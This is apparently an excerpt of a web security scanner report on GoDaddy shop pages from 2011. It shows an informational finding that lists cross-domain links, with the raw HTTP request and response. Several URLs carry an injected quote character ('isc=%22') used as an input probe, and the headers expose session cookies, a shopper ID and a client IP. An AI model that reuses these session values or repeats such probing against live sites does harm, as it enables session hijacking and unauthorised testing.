<meta name="keywords" content="Go Daddy.com, Go Daddy, godaddy.com, godaddy, payment methods, payment options, Go Daddy.com, Go Daddy, godaddy.com, godaddy" /><link rel="shortcut icon" href="http://img1.wsimg.com/assets/godaddy.ico" /></head>
<body id="ctl00_PageBody" style="width:100%;margin:0;">

<script src="http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"></script>
...[SNIP]...
<li title="Bob Parsons Blog" onclick="pcj_lnkPop('http://www.bobparsons.me/index.php?isc=%22&ci=13338&id=-1', '_blank'); return false;"><a href="http://www.bobparsons.me/index.php?id=-1">Bob's Video Blog</a>
...[SNIP]...
<strong><a href="https://login.secureserver.net/index.php">
Check My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/">
Check My Webmail</a>
...[SNIP]...
<div align="left">

                   <img src="http://img1.wsimg.com/assets/prepayment/txt_payment_head.gif" border="0" alt="" /><br/>
...[SNIP]...
<td align="left" valign="top">
                                    <img src="http://img1.wsimg.com/assets/prepayment/PayPal_mark_80x50.gif" border="0" width="80" height="50" alt="PayPal Accepted" />
                                </td>
...[SNIP]...
<td align="left" valign="top">
                                    <img src="http://img1.wsimg.com/assets/prepayment/img_payment_checks.gif" border="0" alt="" />
                                </td>
...[SNIP]...
<td align="left" valign="top"><img src="http://img1.wsimg.com/assets/prepayment/26125_img_payment_cc.gif" border="0" alt="" /></td>
...[SNIP]...
<td align="left" valign="top"><img src="http://img1.wsimg.com/assets/prepayment/img_giftcard.gif" border="0" alt="" /></td>
...[SNIP]...
<td align="center" valign="top">
                                    <img alt="GoodAsGold" src="http://img1.wsimg.com/assets/prepayment/img_payment_gag_logo.gif" border="0"/>
                                </td>
...[SNIP]...
<a class="bodyText" href="#" onclick="SubmitToPage_onclick('http://www.godaddy.com/gdshop/shopper_new.asp?isc=%22&prog_id=GoDaddy&prepayment=1&ci=42537',36918, event); return false;">
                                        <img src="http://img1.wsimg.com/assets/prepayment/btn_createacct_orange.gif" border="0" alt="" /></a>
...[SNIP]...
ass="bodyText" href="#" onclick="SubmitToPage_onclick('http://www.godaddy.com/gdshop/prepayment/shopper_prepayment_update.asp?isc=%22&prog_id=GoDaddy&ci=42538',36919); return false;">
                                        <img src="http://img1.wsimg.com/assets/prepayment/btn_acctexist_orange.gif" border="0" alt="" /></a>
...[SNIP]...
<div class="div_cols">
<a href="https://login.secureserver.net/index.php?isc=%22&ci=17195&prog_id=GoDaddy&app=wbe" target="_blank">Webmail</a>
...[SNIP]...
</b> or cause that you believe Go Daddy should
support, visit <a style="color:blue;text-decoration:underline;font-size:12px;" href="http://www.godaddycares.com" onclick="pcj_win('http://img.godaddy.com/redirect.aspx?isc=%22&ci=42374&target=http%3a%2f%2fwww.godaddycares.com'); return false;">GoDaddyCares.com</a>
...[SNIP]...
</div>

<script src="http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2" type="text/javascript"></script>

<script src="http://img3.wsimg.com/fos/script/sales16.min.js" type="text/javascript"></script>
...[SNIP]...

17.38. http://www.godaddy.com/gdshop/offers/cross_sell.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/gdshop/offers/cross_sell.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault

The response contains the following links to other domains:

http://imagesak.securepaynet.net/AtlantisScripts/jquery/jquery-1.3.1.min.js
http://imagesak.securepaynet.net/aaa/common/1/img_specials.gif
http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif
http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif
http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif
http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif
http://imagesak.securepaynet.net/aaa/hosting/1/img_fav.gif
http://imagesak.securepaynet.net/aaa/offers/1/31217_qsc_animated.gif
http://imagesak.securepaynet.net/aaa/offers/1/img_drkarrows.gif
http://imagesak.securepaynet.net/aaa/offers/15564_mail.gif
http://imagesak.securepaynet.net/aaa/offers/15564_tb.gif
http://imagesak.securepaynet.net/aaa/offers/15564_wst.gif
http://imagesak.securepaynet.net/aaa/offers/bul_minus.gif
http://imagesak.securepaynet.net/aaa/offers/bul_plus.gif
http://imagesak.securepaynet.net/aaa/offers/icn_dns_xsell.png
http://imagesak.securepaynet.net/aaa/offers/img_fixed.gif
http://imagesak.securepaynet.net/aaa/offers/img_minus.gif
http://imagesak.securepaynet.net/aaa/offers/img_plus.gif
http://imagesak.securepaynet.net/assets/godaddy.ico
http://imagesak.securepaynet.net/assets/spc_trans.gif
http://imagesak.securepaynet.net/css/20090113_1.css
http://img2.wsimg.com/pc_css/1/gd_20110829_http.min.css
http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
http://www.bobparsons.me/index.php?id=-1
http://www.godaddycares.com/
https://email.secureserver.net/
https://login.secureserver.net/index.php
https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe

Request

GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; expires=Sun, 02-Sep-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB109&sitename=www%2Egodaddy%2Ecom&cookies=1&split=24&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&referringdomain=&referringpath=8d587be0%2D834e%2D4a03%2D83dc%2D2f3bcb783a40&shopper=46215684&querystring=ci%3D42031%26config%3Dssldefault; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:45:24 GMT
Content-Length: 271865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Low cost domain names, domain transfers, web hosting, em
...[SNIP]...
DNS, URL, web address, internet address, web site name, bulk domain registration, buy domain, private domain registration, bulk price, .com, .net, .org, Go Daddy.com, Go Daddy, godaddy.com, godaddy">
<link rel="shortcut icon" href="http://imagesak.securepaynet.net/assets/godaddy.ico">
<link rel="stylesheet" type="text/css" href="http://img2.wsimg.com/pc_css/1/gd_20110829_http.min.css" /><link rel="stylesheet" type="text/css" href="http://imagesak.securepaynet.net/css/20090113_1.css">

<style type="text/css">
...[SNIP]...
<body bgcolor="#FFFFFF" topmargin="0" leftmargin="0" marginheight="0" marginwidth="0" onload="GetVisibleCICodes(event);" style="text-align:left; margin:0;">
<script src="http://imagesak.securepaynet.net/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"></script><div style="position:absolute;top:0;left:0;width:1px;height:1px;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" border="0" width="1" height="1" alt="Welcome to Go Daddy Software. If you are visually impaired and would like to check the availability of a domain, make a purchase, or just have questions please call us at (480) 505-8877. You may also email us at support@godaddy.com to request a website service callback.. We are currently in the process of implementing more accessibility for our visitors so feel free to check back in the near future..Thank you for your interest in our company."></div>
...[SNIP]...

<script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"></script>
...[SNIP]...
<li title="Bob Parsons Blog" onclick="pcj_lnkPop('http://www.bobparsons.me/index.php?ci=13338&id=-1', '_blank'); return false;"><a href="http://www.bobparsons.me/index.php?id=-1">Bob's Video Blog</a>
...[SNIP]...
<strong><a href="https://login.secureserver.net/index.php">
Check My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/">
Check My Webmail</a>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
